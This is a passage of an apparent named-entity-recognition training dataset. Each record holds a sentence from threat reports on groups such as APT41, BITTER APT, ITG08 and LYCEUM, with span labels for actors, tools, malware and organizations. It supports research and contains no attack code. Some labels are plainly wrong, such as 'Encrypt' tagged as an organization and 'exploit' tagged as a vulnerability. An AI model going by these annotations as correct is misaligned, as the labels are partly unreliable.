APT20": [[162, 167]]}, "info": 
{"id": "dnrti_train_003082", "source": "dnrti_train"}} {"text": "APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: CROSSWALK.BIN": [[15, 28]]}, "info": {"id": "dnrti_train_003083", "source": "dnrti_train"}} {"text": "Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 .", "spans": {"THREAT_ACTOR: espionage group": [[16, 31]], "TOOL: CLASSFON": [[54, 62]]}, "info": {"id": "dnrti_train_003084", "source": "dnrti_train"}} {"text": "At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group .", "spans": {"TOOL: HIGHNOON.CLI": [[41, 53]], "TOOL: GEARSHIFT": [[58, 67]], "THREAT_ACTOR: APT17": [[88, 93]], "THREAT_ACTOR: group": [[134, 139]]}, "info": {"id": "dnrti_train_003085", "source": "dnrti_train"}} {"text": "APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: code-signing certificates": [[26, 51]]}, "info": {"id": "dnrti_train_003086", "source": "dnrti_train"}} {"text": "In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]]}, "info": {"id": "dnrti_train_003087", "source": "dnrti_train"}} {"text": "In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company .", "spans": {"THREAT_ACTOR: APT41": [[14, 19]], "TOOL: TeamViewer": [[25, 35]]}, "info": {"id": "dnrti_train_003089", "source": "dnrti_train"}} {"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "VULNERABILITY: exploit": [[52, 59]], "VULNERABILITY: CVE-2019-3396": [[69, 82]]}, "info": {"id": 
"dnrti_train_003090", "source": "dnrti_train"}} {"text": "We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload .", "spans": {"THREAT_ACTOR: APT41": [[12, 17]]}, "info": {"id": "dnrti_train_003092", "source": "dnrti_train"}} {"text": "The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: HIGHNOON": [[136, 144]], "TOOL: SOGU": [[149, 153]]}, "info": {"id": "dnrti_train_003093", "source": "dnrti_train"}} {"text": "APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003094", "source": "dnrti_train"}} {"text": "To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files .", "spans": {"THREAT_ACTOR: APT41": [[23, 28]], "TOOL: Sticky Keys": [[53, 64]], "TOOL: scheduled tasks": [[81, 96]], "TOOL: bootkits": [[99, 107]], "TOOL: rootkits": [[110, 118]], "TOOL: registry modifications": [[121, 143]]}, "info": {"id": "dnrti_train_003095", "source": "dnrti_train"}} {"text": "APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: ROCKBOOT": [[16, 24]]}, "info": {"id": "dnrti_train_003096", "source": "dnrti_train"}} {"text": "APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) 
traffic .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003097", "source": "dnrti_train"}} {"text": "The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_003099", "source": "dnrti_train"}} {"text": "APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003100", "source": "dnrti_train"}} {"text": "APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: SOGU": [[23, 27]], "TOOL: CROSSWALK": [[32, 41]]}, "info": {"id": "dnrti_train_003101", "source": "dnrti_train"}} {"text": "Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions .", "spans": {"TOOL: HOMEUNIX backdoor": [[67, 84]], "THREAT_ACTOR: APT41": [[87, 92]], "TOOL: PHOTO": [[150, 155]]}, "info": {"id": "dnrti_train_003102", "source": "dnrti_train"}} {"text": "Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 .", "spans": {"THREAT_ACTOR: APT41": [[120, 125]]}, "info": {"id": "dnrti_train_003103", "source": "dnrti_train"}} {"text": "APT41 has been observed creating a RAR archive of targeted files for exfiltration .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003104", "source": "dnrti_train"}} {"text": "APT41 is unique among tracked China-based actors 
in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003105", "source": "dnrti_train"}} {"text": "During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections .", "spans": {"THREAT_ACTOR: APT41": [[30, 35]]}, "info": {"id": "dnrti_train_003106", "source": "dnrti_train"}} {"text": "Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward .", "spans": {"THREAT_ACTOR: APT41": [[119, 124]]}, "info": {"id": "dnrti_train_003107", "source": "dnrti_train"}} {"text": "APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003108", "source": "dnrti_train"}} {"text": "For example , the group has repeatedly targeted call record information at telecom companies .", "spans": {"THREAT_ACTOR: group": [[18, 23]], "ORGANIZATION: telecom": [[75, 82]], "ORGANIZATION: companies": [[83, 92]]}, "info": {"id": "dnrti_train_003109", "source": "dnrti_train"}} {"text": "APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003110", "source": "dnrti_train"}} {"text": "The group’s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware .", "spans": {"ORGANIZATION: video game 
industry": [[72, 91]], "THREAT_ACTOR: APT41": [[100, 105]]}, "info": {"id": "dnrti_train_003111", "source": "dnrti_train"}} {"text": "These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns .", "spans": {"THREAT_ACTOR: APT41’s": [[71, 78]]}, "info": {"id": "dnrti_train_003113", "source": "dnrti_train"}} {"text": "Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers .", "spans": {"THREAT_ACTOR: APT41": [[141, 146]]}, "info": {"id": "dnrti_train_003114", "source": "dnrti_train"}} {"text": "Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs .", "spans": {"THREAT_ACTOR: APT41": [[88, 93]]}, "info": {"id": "dnrti_train_003115", "source": "dnrti_train"}} {"text": "The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]]}, "info": {"id": "dnrti_train_003116", "source": "dnrti_train"}} {"text": "APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: malware families": [[48, 64]], "TOOL: tools": [[69, 74]], "THREAT_ACTOR: group": [[228, 233]]}, "info": {"id": "dnrti_train_003117", "source": "dnrti_train"}} {"text": "Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware .", "spans": {"THREAT_ACTOR: APT41": 
[[32, 37]]}, "info": {"id": "dnrti_train_003118", "source": "dnrti_train"}} {"text": "APT41 often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003119", "source": "dnrti_train"}} {"text": "APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003120", "source": "dnrti_train"}} {"text": "Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015 .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]]}, "info": {"id": "dnrti_train_003122", "source": "dnrti_train"}} {"text": "This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons .", "spans": {"THREAT_ACTOR: group's": [[44, 51]]}, "info": {"id": "dnrti_train_003123", "source": "dnrti_train"}} {"text": "With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region .", "spans": {"THREAT_ACTOR: attackers": [[90, 99]]}, "info": {"id": "dnrti_train_003125", "source": "dnrti_train"}} {"text": "Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 .", "spans": {"ORGANIZATION: Serbian security": [[55, 71]]}, "info": {"id": "dnrti_train_003126", "source": "dnrti_train"}} {"text": "The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 .", "spans": {}, "info": {"id": "dnrti_train_003127", "source": 
"dnrti_train"}} {"text": "Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"THREAT_ACTOR: attacks": [[37, 44]]}, "info": {"id": "dnrti_train_003128", "source": "dnrti_train"}} {"text": "We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"THREAT_ACTOR: BalkanDoor": [[34, 44]], "VULNERABILITY: CVE-2018-20250": [[134, 148]]}, "info": {"id": "dnrti_train_003129", "source": "dnrti_train"}} {"text": "Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"MALWARE: BalkanRAT": [[5, 14]], "MALWARE: BalkanDoor": [[19, 29]]}, "info": {"id": "dnrti_train_003130", "source": "dnrti_train"}} {"text": "According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 .", "spans": {}, "info": {"id": "dnrti_train_003131", "source": "dnrti_train"}} {"text": "Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer .", "spans": {"THREAT_ACTOR: attacker": [[34, 42]], "TOOL: BalkanRAT": [[100, 109]]}, "info": {"id": "dnrti_train_003133", "source": "dnrti_train"}} {"text": "The BalkanDoor backdoor does not implement any exfiltration channel .", "spans": {"TOOL: BalkanDoor": [[4, 14]], "TOOL: backdoor": [[15, 23]]}, "info": {"id": "dnrti_train_003134", "source": "dnrti_train"}} {"text": "APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: ADORE.XSEC": [[16, 26]]}, "info": {"id": "dnrti_train_003135", "source": "dnrti_train"}} {"text": "The main part of the 
BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": {"MALWARE: BalkanRAT malware": [[21, 38]]}, "info": {"id": "dnrti_train_003137", "source": "dnrti_train"}} {"text": "Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher .", "spans": {"THREAT_ACTOR: APT41's": [[28, 35]], "TOOL: POISONPLUG": [[36, 46]]}, "info": {"id": "dnrti_train_003138", "source": "dnrti_train"}} {"text": "The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 .", "spans": {}, "info": {"id": "dnrti_train_003139", "source": "dnrti_train"}} {"text": "Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 .", "spans": {"ORGANIZATION: Encrypt": [[19, 26]]}, "info": {"id": "dnrti_train_003140", "source": "dnrti_train"}} {"text": "One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 .", "spans": {"ORGANIZATION: CERT 360": [[100, 108]], "THREAT_ACTOR: BITTER APT": [[130, 140]]}, "info": {"id": "dnrti_train_003141", "source": "dnrti_train"}} {"text": "Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China .", "spans": {"THREAT_ACTOR: BITTER APT’s": [[24, 36]]}, "info": {"id": "dnrti_train_003142", "source": "dnrti_train"}} {"text": "Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China .", "spans": {}, "info": {"id": "dnrti_train_003143", "source": "dnrti_train"}} {"text": "We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials 
and obtain access to privileged account information .", "spans": {"THREAT_ACTOR: BITTER APT": [[17, 27]]}, "info": {"id": "dnrti_train_003144", "source": "dnrti_train"}} {"text": "This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT .", "spans": {"THREAT_ACTOR: BITTER APT": [[67, 77]], "ORGANIZATION: 360-CERT": [[169, 177]]}, "info": {"id": "dnrti_train_003145", "source": "dnrti_train"}} {"text": "BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically .", "spans": {"THREAT_ACTOR: BITTER APT": [[0, 10]]}, "info": {"id": "dnrti_train_003147", "source": "dnrti_train"}} {"text": "As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China .", "spans": {"ORGANIZATION: Anomali": [[50, 57]]}, "info": {"id": "dnrti_train_003148", "source": "dnrti_train"}} {"text": "360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[0, 30]], "THREAT_ACTOR: BITTER APT": [[86, 96]]}, "info": {"id": "dnrti_train_003149", "source": "dnrti_train"}} {"text": "China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels .", "spans": {"TOOL: China Chopper": [[0, 13]], "THREAT_ACTOR: Leviathan": [[82, 91]], "THREAT_ACTOR: Threat Group-3390": [[96, 113]]}, "info": {"id": "dnrti_train_003150", "source": "dnrti_train"}} {"text": "Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , 
which shows that even nine years after its creation , attackers are using China Chopper without significant modifications .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "TOOL: China Chopper": [[35, 48], [180, 193]], "THREAT_ACTOR: attackers": [[160, 169]]}, "info": {"id": "dnrti_train_003152", "source": "dnrti_train"}} {"text": "Here , we investigate a campaign targeting an Asian government organization .", "spans": {"ORGANIZATION: government organization": [[52, 75]]}, "info": {"id": "dnrti_train_003153", "source": "dnrti_train"}} {"text": "We observed another campaign targeting an organisation located in Lebanon .", "spans": {}, "info": {"id": "dnrti_train_003154", "source": "dnrti_train"}} {"text": "They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": {"MALWARE: Mimikatz Lite": [[125, 138]], "MALWARE: GetPassword.exe": [[142, 157]]}, "info": {"id": "dnrti_train_003156", "source": "dnrti_train"}} {"text": "The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit .", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "VULNERABILITY: CVE-2018–8440": [[30, 43]], "VULNERABILITY: vulnerability": [[72, 85]], "VULNERABILITY: proof-of-concept": [[208, 224]], "VULNERABILITY: exploit": [[225, 232]]}, "info": {"id": "dnrti_train_003158", "source": "dnrti_train"}} {"text": "The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_003159", "source": "dnrti_train"}} {"text": "The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims .", "spans": 
{"THREAT_ACTOR: Cloud Atlas": [[26, 37]]}, "info": {"id": "dnrti_train_003160", "source": "dnrti_train"}} {"text": "From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts .", "spans": {"THREAT_ACTOR: threat actor": [[121, 133]]}, "info": {"id": "dnrti_train_003161", "source": "dnrti_train"}} {"text": "We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[43, 54]], "ORGANIZATION: Palo Alto": [[85, 94]]}, "info": {"id": "dnrti_train_003162", "source": "dnrti_train"}} {"text": "Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[13, 24]], "VULNERABILITY: CVE-2017-11882": [[140, 154]], "VULNERABILITY: CVE-2018-0802": [[166, 179]]}, "info": {"id": "dnrti_train_003164", "source": "dnrti_train"}} {"text": "This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[49, 60]]}, "info": {"id": "dnrti_train_003165", "source": "dnrti_train"}} {"text": "Cloud Atlas remains very prolific in Eastern Europe and Central Asia .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[0, 11]]}, "info": {"id": "dnrti_train_003166", "source": "dnrti_train"}} {"text": "During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[30, 41]]}, "info": {"id": "dnrti_train_003167", "source": "dnrti_train"}} 
{"text": "The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[4, 19]]}, "info": {"id": "dnrti_train_003168", "source": "dnrti_train"}} {"text": "In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]]}, "info": {"id": "dnrti_train_003169", "source": "dnrti_train"}} {"text": "In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[219, 234]]}, "info": {"id": "dnrti_train_003170", "source": "dnrti_train"}} {"text": "Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: documents": [[135, 144]]}, "info": {"id": "dnrti_train_003171", "source": "dnrti_train"}} {"text": "Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files .", "spans": {"THREAT_ACTOR: they": [[5, 9]], "TOOL: (RMS)": [[85, 90]]}, "info": {"id": "dnrti_train_003172", "source": "dnrti_train"}} {"text": "During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 .", "spans": {"THREAT_ACTOR: ITG08": [[124, 129]], "THREAT_ACTOR: FIN6": [[146, 150]]}, "info": {"id": "dnrti_train_003174", "source": "dnrti_train"}} {"text": "More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout 
pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers .", "spans": {"THREAT_ACTOR: ITG08": [[16, 21]]}, "info": {"id": "dnrti_train_003175", "source": "dnrti_train"}} {"text": "This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider .", "spans": {"THREAT_ACTOR: ITG08": [[30, 35]]}, "info": {"id": "dnrti_train_003176", "source": "dnrti_train"}} {"text": "ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe .", "spans": {"THREAT_ACTOR: ITG08": [[0, 5]]}, "info": {"id": "dnrti_train_003177", "source": "dnrti_train"}} {"text": "Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 .", "spans": {"THREAT_ACTOR: ITG08": [[18, 23]], "TOOL: More_eggs backdoor": [[34, 52]]}, "info": {"id": "dnrti_train_003178", "source": "dnrti_train"}} {"text": "Attackers use it to create , expand and cement their foothold in compromised environments .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_003179", "source": "dnrti_train"}} {"text": "Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign .", "spans": {"THREAT_ACTOR: ITG08": [[9, 14]], "TOOL: Comodo code-signing certificates": [[20, 52]]}, "info": {"id": "dnrti_train_003180", "source": "dnrti_train"}} {"text": "Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": {"THREAT_ACTOR: ITG08’s": [[28, 35]], "MALWARE: More_eggs backdoor": [[191, 209]]}, "info": {"id": "dnrti_train_003181", "source": "dnrti_train"}} {"text": 
"X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "MALWARE: More_eggs backdoor": [[33, 51]]}, "info": {"id": "dnrti_train_003183", "source": "dnrti_train"}} {"text": "Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment .", "spans": {"THREAT_ACTOR: ITG08": [[9, 14]], "TOOL: WMI": [[69, 72]], "TOOL: PowerShell": [[77, 87]]}, "info": {"id": "dnrti_train_003184", "source": "dnrti_train"}} {"text": "The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_003185", "source": "dnrti_train"}} {"text": "In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes .", "spans": {"TOOL: More_eggs": [[19, 28]], "THREAT_ACTOR: ITG08": [[39, 44]], "TOOL: Mimikatz": [[116, 124]]}, "info": {"id": "dnrti_train_003186", "source": "dnrti_train"}} {"text": "A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor .", "spans": {"THREAT_ACTOR: ITG08": [[33, 38]], "TOOL: More_eggs JScript backdoor": [[62, 88]]}, "info": {"id": "dnrti_train_003187", "source": "dnrti_train"}} {"text": "After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components .", "spans": {"THREAT_ACTOR: ITG08": [[102, 107]], "TOOL: More_eggs JScript backdoor": [[130, 156]]}, "info": 
{"id": "dnrti_train_003189", "source": "dnrti_train"}} {"text": "Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack .", "spans": {"TOOL: More_eggs": [[13, 22]], "THREAT_ACTOR: ITG08": [[39, 44]], "TOOL: offensive security tools": [[72, 96]], "TOOL: PowerShell scripts": [[101, 119]]}, "info": {"id": "dnrti_train_003190", "source": "dnrti_train"}} {"text": "After injecting Meterpreter into memory , the attacker had complete control of the infected device .", "spans": {"THREAT_ACTOR: attacker": [[46, 54]]}, "info": {"id": "dnrti_train_003191", "source": "dnrti_train"}} {"text": "IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms .", "spans": {"ORGANIZATION: IBM X-Force IRIS": [[0, 16]], "THREAT_ACTOR: ITG08’s": [[41, 48]], "TOOL: tools": [[131, 136]]}, "info": {"id": "dnrti_train_003192", "source": "dnrti_train"}} {"text": "After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices .", "spans": {"THREAT_ACTOR: ITG08": [[65, 70]], "TOOL: More_eggs backdoor": [[80, 98]]}, "info": {"id": "dnrti_train_003193", "source": "dnrti_train"}} {"text": "In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity .", "spans": {"THREAT_ACTOR: ITG08’s": [[110, 117]], "TOOL: PowerShell": [[125, 135]]}, "info": {"id": "dnrti_train_003194", "source": "dnrti_train"}} {"text": "The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications .", "spans": {"THREAT_ACTOR: LYCEUM": [[4, 10]]}, "info": {"id": "dnrti_train_003195", "source": "dnrti_train"}} {"text": "CTU research 
indicates that LYCEUM may have been active as early as April 2018 .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: LYCEUM": [[28, 34]]}, "info": {"id": "dnrti_train_003196", "source": "dnrti_train"}} {"text": "In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East .", "spans": {"THREAT_ACTOR: group": [[25, 30]]}, "info": {"id": "dnrti_train_003197", "source": "dnrti_train"}} {"text": "This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 .", "spans": {}, "info": {"id": "dnrti_train_003198", "source": "dnrti_train"}} {"text": "Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[79, 91]], "THREAT_ACTOR: OilRig": [[113, 119]], "THREAT_ACTOR: Crambus": [[122, 129]], "THREAT_ACTOR: APT34": [[136, 141]], "THREAT_ACTOR: COBALT TRINITY": [[146, 160]], "THREAT_ACTOR: Elfin": [[175, 180]], "THREAT_ACTOR: APT33": [[185, 190]]}, "info": {"id": "dnrti_train_003199", "source": "dnrti_train"}} {"text": "When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed .", "spans": {"ORGANIZATION: CTU": [[5, 8]], "THREAT_ACTOR: LYCEUM": [[55, 61]]}, "info": {"id": "dnrti_train_003200", "source": "dnrti_train"}} {"text": "Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools .", "spans": {"THREAT_ACTOR: LYCEUM": [[29, 35]], "TOOL: post-intrusion tools": [[154, 174]]}, "info": {"id": "dnrti_train_003201", "source": "dnrti_train"}} {"text": "Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP 
.", "spans": {"TOOL: Get-LAPSP.ps1": [[0, 13]], "TOOL: PowerShell script": [[19, 36]]}, "info": {"id": "dnrti_train_003203", "source": "dnrti_train"}} {"text": "LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]], "TOOL: DanBot": [[30, 36]]}, "info": {"id": "dnrti_train_003204", "source": "dnrti_train"}} {"text": "LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]], "TOOL: maldocs": [[27, 34]]}, "info": {"id": "dnrti_train_003205", "source": "dnrti_train"}} {"text": "This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[35, 43]], "ORGANIZATION: executives": [[57, 67]], "ORGANIZATION: HR staff": [[70, 78]], "ORGANIZATION: IT personnel": [[85, 97]]}, "info": {"id": "dnrti_train_003206", "source": "dnrti_train"}} {"text": "Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": {"TOOL: maldoc": [[40, 46]], "ORGANIZATION: ICS": [[71, 74]], "ORGANIZATION: OT staff": [[78, 86]], "THREAT_ACTOR: LYCEUM": [[89, 95]]}, "info": {"id": "dnrti_train_003207", "source": "dnrti_train"}} {"text": "However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment .", "spans": {"ORGANIZATION: CTU": [[10, 13]], "THREAT_ACTOR: LYCEUM": [[66, 72]]}, "info": {"id": 